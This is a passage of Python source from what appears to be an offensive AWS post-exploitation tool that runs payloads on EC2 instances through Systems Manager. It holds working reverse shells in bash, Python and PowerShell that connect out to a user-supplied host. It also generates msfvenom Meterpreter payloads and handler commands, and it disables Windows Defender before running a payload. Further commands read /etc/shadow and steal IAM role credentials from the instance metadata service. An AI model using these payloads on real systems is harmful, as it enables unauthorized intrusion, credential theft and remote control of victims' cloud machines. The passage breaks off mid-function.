def wait_for_threaded_command_invocation( commandid,instanceid, region):
"""
A thread-ready function to wait for invocation for a command on an instance.
TODO: Make it thread-safe by using locks on the global variables.
:param commandid: The command that was run
:param instanceid: The instance on which the command was run.
:param region: The region for Systems Manager
:return: Returns a tuple of success state and AWS response json in full.
"""
global my_aws_creds
logger = logging.getLogger('log')
logger.error('inside wait_for_threaded_command_invocation for %s and commandid: %s' %( instanceid,commandid))
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=region,
aws_session_token=my_aws_creds['aws_session_token'])
ssmclient = mysession.client('ssm', region_name=region)
time.sleep(10)
logger.error('inside wait_for_threaded_command_invocation for %s and commandid: %s, before get_command_invocation a' % (instanceid, commandid))
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
logger.error(
'inside wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation a, status: %s' % (
instanceid, commandid,result['Status']))
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
logger.error(
'failure in wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation b, status: %s' % (
instanceid, commandid, result['Status']))
return False, result
if result['Status'] == 'Success':
logger.error(
'success in wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation b, status: %s' % (
instanceid, commandid, result['Status']))
return True, result
def run_linux_command(ssmclient, instanceid, action, payload):
"""
Run a Systems Manager command on a running Linux instance.
:param ssmclient: Systems Manager client for the required region.
:param instanceid: id of target instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a bash script)
:param payload: The actual payload to be executed on the target instance.
:return: returns status of execution.
"""
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
return success
def run_threaded_linux_command(mysession, target, action, payload):
"""
Thread-enabled function to run a Systems Manager command on a running Linux instance.
TODO: Make it thread-safe by using locks on global variables.
:param mysession: The established boto3 session for the target region
:param target: Target EC2 instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a bash script)
:param payload: The actual payload to be executed on the target instance.
:return: None
"""
global my_aws_creds
global command_invocations
logger = logging.getLogger('log')
logger.error('inside run_threaded_linux_command for %s' %target['id'])
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'], region_name=target['region'],
aws_session_token=my_aws_creds['aws_session_token'])
ssmclient = mysession.client('ssm',region_name=target['region'])
instanceid = target['id']
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
logger.error('calling run_threaded_linux_command for %s and command: %s' %(target['id'],commandid))
command = {'id':commandid}
command['instanceid'] = instanceid
command['state'] = 'requested'
command['platform'] = 'linux'
command['region'] = target['region']
command_invocations['commands'].append(command)
time.sleep(10)
try:
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except:
pass
logger.error('calling run_threaded_linux_command for %s and command: %s and result: %s' % (target['id'], commandid,result['Status']))
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
logger.error('run_threaded_linux_command for %s and command: %s failed with error: %s' % (target['id'], commandid, result['StandardErrorContent']))
commandx['state'] = 'failed'
commandx['error'] = result['StandardErrorContent']
command_invocations['commands'][index] = commandx
return False
if result['Status'] == 'Success':
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
logger.error('run_threaded_linux_command for %s and command: %s succeeded with output: %s' % (target['id'], commandid, result['StandardOutputContent']))
commandx['state'] = 'success'
commandx['output'] = result['StandardOutputContent']
command_invocations['commands'][index] = commandx
def run_threaded_windows_command(mysession, target, action, payload, disableav):
"""
Thread-enabled function to run a Systems Manager command on a running Windows instance.
It actually calls three commands: Disable windows defender, run the payload, then enable Windows Defender.
TODO: Make it thread-safe by using locks on global variables.
:param mysession: The established boto3 session for the target region
:param target: Target EC2 instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a powershell script)
:param payload: The actual payload to be executed on the target instance.
:return: None
"""
global my_aws_creds
global command_invocations
logger = logging.getLogger('log')
logger.error("inside run_threaded_windows_command for %s" % target['id'])
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=target['region'],
aws_session_token=my_aws_creds['aws_session_token'])
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'],'ssmclient'))
ssmclient = mysession.client('ssm',region_name=target['region'])
instanceid = target['id']
#stage1 disable windows defender.
if disableav:
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'disable_windows_defender'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[disable_windows_defender()]})
commandid = response['Command']['CommandId']
#############
time.sleep(10)
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'get_command_invocation 1'))
try:
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except:
pass
#############
success, result = wait_for_threaded_command_invocation(commandid,instanceid, target['region'])
logger.error("inside run_threaded_windows_command for %s, after line: %s" % (target['id'], 'wait_for_threaded_command_invocation 1'))
logger.error("success equals: %s" %success)
if not success:
logger.error('aborting commands for id %s' %target['id'])
return False
#stage2 run payload
time.sleep(3)
logger.error(
"inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'windows payload'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
#################
command = {'id':commandid}
command['instanceid'] = instanceid
command['state'] = 'requested'
command['platform'] = 'windows'
command['region'] = target['region']
command_invocations['commands'].append(command)
time.sleep(10)
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'get_command_invocation 2'))
try:
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except:
pass
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
logger.error("failure running payload in run_threaded_windows_command for %s, commandid: %s" % (target['id'], commandid))
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
commandx['state'] = 'failed'
commandx['error'] = result['StandardErrorContent']
command_invocations['commands'][index] = commandx
success = False
break
if result['Status'] == 'Success':
logger.error(
"success running payload in run_threaded_windows_command for %s. commandid: %s" % (target['id'], commandid))
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
commandx['state'] = 'success'
commandx['output'] = result['StandardOutputContent']
command_invocations['commands'][index] = commandx
success = True
break
#################
if not success:
logger.error("inside run_threaded_windows_command for %s, failed in running payload" % (target['id']))
#stage3 enable windows defender.
if disableav:
time.sleep(30)
logger.error("inside run_threaded_windows_command for %s, before enable_windows_defender" % (target['id']))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[enable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_threaded_command_invocation(commandid,instanceid,target['region'])
logger.error("inside run_threaded_windows_command for %s, after enable_windows_defender, success: %s" % (target['id'], success))
if not success:
return False
return True
def run_windows_command(ssmclient, instanceid,action,payload, disableav):
"""
Run a Systems Manager command on a running Windows instance.
It actually calls three commands: Disable windows defender, run the payload, then enable Windows Defender.
:param ssmclient: The Systems Manager client for the target region
:param instanceid: Target EC2 instance id
:param action: Action to be run (AWS calls it DocumentName, here it's running a powershell script)
:param payload: The actual payload to be executed on the target instance.
:return: status of execution
"""
time.sleep(3)
#stage1 disable windows defender.
if disableav:
puts(color('[..] Disabling Windows Defender momentarily...'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[disable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not disable Windows Defender... Stopping command invocation...'))
return False
#stage2 run payload
puts(color('[..] Running payload...'))
time.sleep(3)
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not run payload... Stopping command invocation...'))
return False
#stage3 enable windows defender.
if disableav:
time.sleep(30)
puts(color('[..] Enabling Windows Defender again....'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[enable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not enable Windows Defender... Stopping command invocation...'))
return False
return True
PRINT_EC2_METADATA_CMD = "python -c \"import requests, json; b = 'http://169.254.169.254/latest/';m='meta-data/';roleid = requests.get(b+m+'iam/security-credentials/').text; print '{RoleID: %s,'%roleid;print 'Credentials: %s,'%(requests.get(b+m+'iam/security-credentials/%s'%roleid).text); print 'AMIID: %s,'%(requests.get(b+m+'ami-id').text); print 'PublicIP: %s,'%(requests.get(b+m+'public-ipv4').text); print 'PublicHostname:%s,'%(requests.get(b+m+'public-hostname').text); print 'InstanceIdentityDocument: %s,'%(requests.get(b+'dynamic/instance-identity/document').text);print 'UserData:%s}'%(requests.get(b+'user-data/').text);\""
PRINT_EC2_METADATA_PSH = "$b = 'http://169.254.169.254/latest/';$m='meta-data/';$roleid = (Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'iam/security-credentials/')).Content;echo ('--->Role ID: '+$roleid);echo ('--->Credentials: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'iam/security-credentials/'+$roleid)).Content);echo ('--->AMI-ID: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'ami-id')).Content);echo ('--->Public IP: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'public-ipv4')).Content);echo ('--->Public Hostname: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'public-hostname')).Content);echo ('--->Instance Identity Document: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+'dynamic/instance-identity/document')).Content);echo ('--->UserData: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+'user-data/')));"
def choose_training_ami():
"""
Choose the AMI name for the training mode based on the OS choice.
:return: Tuple of OS and AMI name.
"""
puts(color('[*] Choose your EC2 OS:'))
ami_options = [{'selector':'1','prompt':'Linux','return':'linux'},
{'selector':'2','prompt':'Windows','return':'windows'}]
ami = prompt.options('Options:', ami_options)
if ami == 'windows':
return "windows",'Windows_Server-2019-English-Full-Base-2019.01.10'
return "linux",'amzn2-ami-hvm-2.0.20190115-x86_64-gp2'
def shellscript_options(OS):
"""
Prompts command options against an EC2 instance, depending on target OS.
:param OS: Target instance OS.
:return: Tuple of payload and action (AWS SSM DocumentName)
"""
disableav = False
puts(color('[*] Choose your payload:'))
if OS == 'linux':
payload_options = [{'selector':'1','prompt':'cat /etc/passwd','return':'cat /etc/passwd'},
{'selector':'2','prompt':'cat /ect/shadow','return':'cat /etc/shadow'},
{'selector':'3','prompt':'uname -a','return':'uname -a'},
{'selector':'4', 'prompt':'reverse shell to external host', 'return':'reverseshell'},
{'selector':'5','prompt':'whoami','return':'whoami'},
{'selector':'6','prompt':'metasploit','return':'msf'},
{'selector':'7','prompt':'print EC2 metadata and userdata (custom init script)','return':PRINT_EC2_METADATA_CMD},
{'selector':'8','prompt':'Visit a URL from inside EC2 instance','return':'URL'}]
action = 'AWS-RunShellScript'
else:
payload_options = [{'selector':'1','prompt':'ipconfig','return':'ipconfig'},
{'selector':'2', 'prompt':'reverse shell to external host', 'return':'reverseshell'},
{'selector':'3','prompt':'whoami','return':'whoami'},
{'selector':'4','prompt':'metasploit','return':'msf'},
{'selector':'5','prompt':'print EC2 metadata and userdata (custom init script)','return':PRINT_EC2_METADATA_PSH},
{'selector':'6','prompt':'Visit a URL from inside EC2 instance','return':'URL'}]
action = 'AWS-RunPowerShellScript'
payload = prompt.options('Payload:', payload_options)
remote_ip_host = ''
remote_port = ''
if payload == "reverseshell" or payload == "msf":
puts(color('[*] You chose %s option. First provide your remote IP and port to explore shell options.' %payload))
remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
remote_port = prompt.query("Your remote port number:", default="4444")
if payload == "reverseshell":
payload, action = reverseshell_options(remote_ip_host, remote_port, OS)
elif payload == "msf":
payload, action = metasploit_installed_options(remote_ip_host, remote_port, OS)
disableav = True
elif payload == 'URL':
puts(color('[*] Choose the URL to visit from inside the EC2 instance:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
if OS == 'linux':
payload = "python -c \"import requests; print requests.get('%s').text;\"" %URL
else:
payload = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
return payload,action, disableav
def reverseshell_options(host,port, OS):
"""
Prompts for reverse shell options against an EC2 instance depending on its OS.
:param host: The listening server's IP or hostname
:param port: Port to listen on for shells.
:param OS: OS of that target instance.
:return: Tuple of reverse shell payload and action (AWS SSM DocumentName)
"""
puts(color('[*] Choose your reverse shell type:'))
bash_shell = "bash -i >& /dev/tcp/%s/%s 0>&1" %(host, port)
python_shell = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" %(host, port)
powershell_shell = "$client = New-Object System.Net.Sockets.TCPClient(\"%s\",%s);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" %(host, port)
if OS == "linux":
action = "AWS-RunShellScript"
shell_options = [{'selector':'1','prompt':'Bash reverse shell','return':bash_shell},
{'selector':'2','prompt':'Python reverse shell','return':python_shell},
{'selector':'3','prompt':'Empire Python Launcher','return':'empirepython'}]
else:
action = "AWS-RunPowerShellScript"
shell_options = [{'selector':'1','prompt':'Powershell reverse shell','return':powershell_shell},
{'selector':'2','prompt':'Empire Powershell Launcher','return':'empirepowershell'}]
reverseshell = prompt.options('Payload:', shell_options)
if reverseshell == 'empirepowershell' or reverseshell == 'empirepython':
puts(color('[*] Generate your Empire launcher code in empire and paste it here:'))
reverseshell = raw_input('Paste here:')
return reverseshell, action
def reverseshell_multiple_options( linux, windows):
"""
Prompts for reverse shell options against a range of EC2 instances depending on their OS.
:param linux: Whether or not there are any targeted instances running Linux.
:param windows: Whether or not there are any targeted instances running Windows.
:return: Tuple of reverse shell payloads for linux and windows.
"""
puts(color('[*] Choose your reverse shell type:'))
puts(color('[*] Make sure your listening server can handle multiple simultaneous reverse shell connections:'))
linuxattack = ''
windowsattack = ''
if linux:
linux_options = [{'selector':'1','prompt':'Bash reverse shell','return':'bash'},
{'selector':'2','prompt':'Python reverse shell','return':'python'},
{'selector':'3','prompt':'Empire Python Launcher','return':'empirepython'}]
linuxattack = prompt.options('Payload for Linux EC2 instances:', linux_options)
if linuxattack == 'empirepython':
puts(color('[*] Generate your Empire python launcher code in empire and paste it here:'))
linuxattack = raw_input('Paste here:')
else:
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number:", default="4444")
if linuxattack == 'bash':
linuxattack = "bash -i >& /dev/tcp/%s/%s 0>&1" %(host, port)
elif linuxattack == 'python':
linuxattack = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" %(host, port)
if windows:
windows_options = [{'selector':'1','prompt':'Powershell reverse shell','return':'powershell'},
{'selector':'2','prompt':'Empire Powershell Launcher','return':'empirepowershell'}]
windowsattack = prompt.options('Payload for Windows EC2 instances:', windows_options)
if windowsattack == 'empirepowershell':
puts(color('[*] Generate your Empire powershell launcher code in empire and paste it here:'))
windowsattack = raw_input('Paste here:')
else:
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number:", default="5555")
if windowsattack == 'powershell':
windowsattack = "$client = New-Object System.Net.Sockets.TCPClient(\"%s\",%s);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" %(host, port)
return linuxattack,windowsattack
def metasploit_not_installed_options(host, port, OS):
"""
options in case metasploit is not locally installed on attack system.
TODO: Implement this
:param host: The listening server's IP or hostname
:param port: Port to listen on for shells.
:param OS: OS of that target instance.
:return: Nothing
"""
pass
def metasploit_installed_multiple_options( linux, windows):
"""
Prompts for metasploit options against a range of EC2 instances depending on their OS.
:param linux: Whether or not there are any targeted instances running Linux.
:param windows: Whether or not there are any targeted instances running Windows.
:return: Tuple of metasploit payloads for linux and windows.
"""
puts(color('[*] Choose your metasploit payload. This requires msfvenom to be installed in your system.'))
linux_tcp_meterpreterx64 = 'python/meterpreter/reverse_tcp'
linux_https_meterpreterx64 = 'python/meterpreter/reverse_https'
linux_tcp_shell = 'python/shell_reverse_tcp'
windows_tcp_meterpreterx64 = 'windows/x64/meterpreter/reverse_tcp'
windows_https_meterpreterx64 = 'windows/x64/meterpreter/reverse_https'
windows_tcp_shell = 'windows/x64/shell/reverse_tcp'
linuxattack = ''
windowsattack = ''
#remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
#remote_port = prompt.query("Your remote port number:", default="4444")
if linux:
linux_options = [{'selector':'1','prompt':'Linux Meterpreter reverse TCP x64','return':linux_tcp_meterpreterx64},
{'selector':'2','prompt':'Linux Meterpreter reverse HTTPS x64','return':linux_https_meterpreterx64},
{'selector':'3','prompt':'Linux TCP Shell','return':linux_tcp_shell}]
linuxpayload = prompt.options('Payload for Linux EC2 instances:', linux_options)
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number (Listener ports should be different for linux and windows):", default="4444")
linuxmsfshell = 'msfvenom -a python --platform python -p %s LHOST=%s LPORT=%s -f raw --smallest' %(linuxpayload,host, port)
puts(color('[*] Run the following command on your remote listening server to run the linux payload handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, linuxpayload)
puts(colored.magenta(msfconsole_cmd))
linuxattack = os.popen(linuxmsfshell).read()
linuxattack = "python -c \"%s\"" %linuxattack
if windows:
windows_options = [{'selector':'1','prompt':'Windows Meterpreter reverse TCP x64','return':windows_tcp_meterpreterx64},
{'selector':'2','prompt':'Windows Meterpreter reverse HTTPS x64','return':windows_https_meterpreterx64},
{'selector':'3','prompt':'Windows TCP Shell','return':windows_tcp_shell}]
windowspayload = prompt.options('Payload for Windows EC2 instances:', windows_options)
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number (Listener ports should be different for linux and windows):", default="5555")
windowsmsfshell = 'msfvenom -a x64 --platform Windows -p %s LHOST=%s LPORT=%s --f psh-net --smallest' %(windowspayload, host, port)
puts(color('[*] Run the following command on your remote listening server to run the windows payload handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, windowspayload)
puts(colored.magenta(msfconsole_cmd))
windowsattack = os.popen(windowsmsfshell).read()
return linuxattack, windowsattack
def metasploit_installed_options(host, port, OS):
"""
Prompts for metasploit options against an EC2 instance depending on its OS.
:param host: IP or hostname of the listening server running metasploit exploit handler.
:param port: The port the exploit handler is listening on.
:param OS: The OS of the target instance
:return: Tuple of reverse shell payloads for linux and windows.
"""
puts(color('[*] Choose your metasploit payload. This requires msfvenom to be installed in your system.'))
#output = os.popen("msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f psh --smallest").read()`
linux_tcp_meterpreterx64 = 'python/meterpreter/reverse_tcp'
linux_https_meterpreterx64 = 'python/meterpreter/reverse_https'
linux_tcp_shell = 'python/shell_reverse_tcp'
windows_tcp_meterpreterx64 = 'windows/x64/meterpreter/reverse_tcp'
windows_https_meterpreterx64 = 'windows/x64/meterpreter/reverse_https'
windows_tcp_shell = 'windows/x64/shell/reverse_tcp'
if OS == 'linux':
action = 'AWS-RunShellScript'
shell_options = [{'selector':'1','prompt':'Linux Meterpreter reverse TCP x64','return':linux_tcp_meterpreterx64},
{'selector':'2','prompt':'Linux Meterpreter reverse HTTPS x64','return':linux_https_meterpreterx64},
{'selector':'3','prompt':'Linux TCP Shell','return':linux_tcp_shell}]
else:
action = 'AWS-RunPowerShellScript'
shell_options = [{'selector':'1','prompt':'Windows Meterpreter reverse TCP x64','return':windows_tcp_meterpreterx64},{'selector':'2','prompt':'Windows Meterpreter reverse HTTPS x64','return':windows_https_meterpreterx64},
{'selector':'3','prompt':'Windows TCP Shell','return':windows_tcp_shell}]
payload = prompt.options('Payload:', shell_options)
if OS == 'linux':
msfshell = 'msfvenom -p %s LHOST=%s LPORT=%s -f raw --smallest' %(payload,host, port)
else:
msfshell = 'msfvenom -p %s LHOST=%s LPORT=%s --f psh-net --smallest' %(payload, host, port)
puts(color('[*] Run the following command on your reverse server running the handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, payload)
puts(colored.magenta(msfconsole_cmd))
shellcode = os.popen(msfshell).read()
if OS == 'linux':
shellcode = "python -c \"%s\"" %shellcode
return shellcode, action
def start_training_mode(caller):
"""
Start the training mode.
:param caller: menu that called this function
:return: None
"""
global my_aws_creds
mysession = ''
try:
mysession = my_aws_creds['session']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
ec2resource = mysession.resource('ec2')
iamresource = mysession.resource('iam')
ssmclient = mysession.client('ssm')
iamclient = mysession.client('iam')
ec2client = mysession.client('ec2')
with indent(6, quote=">>>>"):
puts(color('[*] Training mode entered'))
puts(color('[..] preparing environment....'))
AssumeRolePolicydata = {'Version': '2012-10-17','Statement': {'Effect': 'Allow','Principal': {'Service': 'ec2.amazonaws.com'},'Action': 'sts:AssumeRole'}}
puts(color('[..] Creating Assume Role Policy...'))
rolename = 'role'+ id_generator()
puts(color('[..] Creating role with name: %s'%rolename))
role = iamresource.create_role(RoleName=rolename,AssumeRolePolicyDocument=json.dumps(AssumeRolePolicydata))
puts(color("[+] Role created successfully."))
puts(color('[..] Attaching needed policies for role...'))
responseforrole = iamclient.attach_role_policy(RoleName=role.name, PolicyArn='arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM')
puts(color('[+] Role attached successfully to policy AmazonEC2RoleforSSM'))
puts(color('[..] Creating EC2 instance profile and adding it to role...'))
instance_profile = iamresource.create_instance_profile(InstanceProfileName=role.name)
instance_profile.add_role(RoleName=role.name)
OS,amznlnxaminame = choose_training_ami()
puts(color('[+] OS chosen is: %s'%OS))
#"amzn2-ami-hvm-2.0.20190115-x86_64-gp2" #"amzn-ami-hvm-2018.03.0.20180811-x86_64-ebs"
puts(color('[+] Amazon AMI used is: %s'%amznlnxaminame))
ami_images = list(ec2resource.images.filter(Filters=[{'Name':'name','Values':[amznlnxaminame,]}]))
amznamiid = ami_images[0].image_id
puts(color('[..] Now creating EC2 instance of type t2.micro with this AMI....'))
time.sleep(10)
newinstances = ec2resource.create_instances(ImageId=amznamiid, InstanceType='t2.micro',MinCount=1,MaxCount=1, IamInstanceProfile={'Name':role.name})
newinstance = newinstances[0]
puts(color('[+] EC2 instance id is: %s'%newinstance.id))
puts(color('[..] Waiting for EC2 instance to complete running..... This will take a while'))
newinstance.wait_until_running()
newinstance.reload()
puts(color('[+] EC2 instance state is: %s'%newinstance.state))
payload,action, disableav = shellscript_options(OS)
puts(color('[..] Sending the command "%s" to the running instance....'%payload))
instanceid = newinstance.id
time.sleep(10)
if OS == 'linux':
success = run_linux_command(ssmclient,instanceid,action,payload)
else:
puts(color('[..] Waiting for Windows EC2 instance to be ready... waiting for 2 minutes...'))
time.sleep(120)
success = run_windows_command(ssmclient,instanceid, action, payload, disableav)
#########
#########
puts(color('[+] Training mode done... Now terminating EC2 instance and deleting IAM role...'))
newinstance.terminate()
puts(color('[..] Waiting for instance to be terminated...'))
newinstance.wait_until_terminated()
puts(color('[+] EC2 instance terminated. Now detaching policy and deleting role...'))
instance_profile.remove_role(RoleName=role.name)
instance_profile.delete()
role.detach_policy(PolicyArn='arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM')
role.delete()
puts(color('[+] Done!'))
go_to_menu(caller)
def process_training_command(command):
"""
Process command in the training menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
training_help()
elif command == 'where':
puts(colored.green("You are in training menu"))
elif command == 'setprofile':
set_aws_creds('training')
elif command == 'start':
start_training_mode('training')
elif command == 'back':
#handle_menu()
menu_backward()
elif command == 'showprofile':
show_aws_creds('training')
elif command == 'exit':
exit()
training_loop()
""" pass
elif command == 'setprofile':
set_aws_creds('main')
elif command == 'showprofile':
show_aws_creds('main')
elif command == 'dumpsecrets':
find_all_creds('main')
elif command == 'attacksurface':
find_attacksurface('main')
"""
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
def instanceidcomplete(text, state):
"""
Auto complete for Instance ID table.
"""
global INSTANCESIDCOMMANDS
for cmd in INSTANCESIDCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def get_instance_details(caller):
"""
Return detailed info in JSON format about a particular instance.
:param caller: The menu that called this function.
:return: None
"""
global my_aws_creds
global ec2instances
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
try:
puts(color('[*] Your collected EC2 instances, if you want an updated list, invoke attacksurface:'))
instances_table = PrettyTable()
possible_regions = []
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name',
'Profile']
if len(ec2instances['instances']) == 0:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
for ins in ec2instances['instances']:
INSTANCESIDCOMMANDS.append(ins['id'])
instances_table.add_row([ins.get('id'), ins.get('platform'), ins.get('region'), ins.get('state'),
ins.get('public_ip_address'),
ins.get('public_dns_name'), ins.get('iam_profile', '')])
except Exception as e:
print(e)
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
print(instances_table)
puts(color('[*] Target Options:'))
#paster
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instanceidcomplete)
target = prompt.query('Type/Paste your target EC2 ID:')
region = ''
for ins in ec2instances['instances']:
if ins['id'] == target:
region = ins['region']
break;
ec2client = mysession.client('ec2',region_name=region)
result = ec2client.describe_instances(InstanceIds=[target,])
jsonstr = json.dumps(result['Reservations'][0]['Instances'][0],indent=4, sort_keys=True, default=str)
print(highlight(jsonstr, JsonLexer(), TerminalFormatter()))
go_to_menu(caller)
def process_instances_command(command):
"""
Process command in the EC2 instances menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
instances_help()
elif command == 'where':
puts(colored.green("You are in EC2 instances menu"))
elif command == 'setprofile':
set_aws_creds('ec2instances')
elif command == 'showprofile':
show_aws_creds('ec2instances')
elif command == 'dumpsecrets':
find_all_creds('ec2instances')
elif command == 'attacksurface':
find_attacksurface('ec2instances')
elif command == 'showsecrets':
show_cred_loot('ec2instances')
elif command == 'securitygroups':
get_security_groups('ec2instances')
elif command == 'ec2attacks':
ec2attacks('ec2instances')
elif command == 'back':
#handle_menu()
menu_backward()
elif command == 'list':
get_ec2_instances('ec2instances')
elif command == 'showsecrets':
show_aws_creds('ec2instances')
elif command == 'commandresults':
check_command_invocations('ec2instances')
elif command == 'instance':
